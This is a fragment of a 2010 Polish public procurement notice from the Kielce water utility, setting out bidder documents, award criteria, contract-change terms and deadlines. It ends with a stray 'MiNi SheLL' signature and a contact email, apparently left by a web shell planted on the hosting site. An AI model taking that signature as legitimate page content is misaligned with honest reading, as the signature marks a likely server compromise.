<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku działania pełnomocnika nalezy dołączyć pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W trakcie realizacji dostawy   Zamawiający przewiduje zmianę zapisów treści umowy  
w następującym przypadku:

-  niedostępności na rynku produktu spowodowanej wstrzymaniem, zaprzestaniem produkcji lub wycofaniem z rynku; zamiana marki produktu, nie może pociągać za sobą zmiany ceny, przy czym jakość proponowanej  marki musi być równorzędna lub lepsza.
- ustawowej zmiany stawki podatku VAT od towarów i usług, strony dopuszczają zmianę wynagrodzenia o kwotę wynikającą ze zmiany podatku VAT naliczonego od przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/ / wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25-701 Kielce ul. Krakowska 64 , Biuro Obsługi Klienta Wodociągi Kieleckie sp. z o.o..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 08:45, miejsce: 25-701 Kielce ul. Krakowska 64 , Biuro Obsługi Klienta Wodociągi Kieleckie sp. z o.o..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com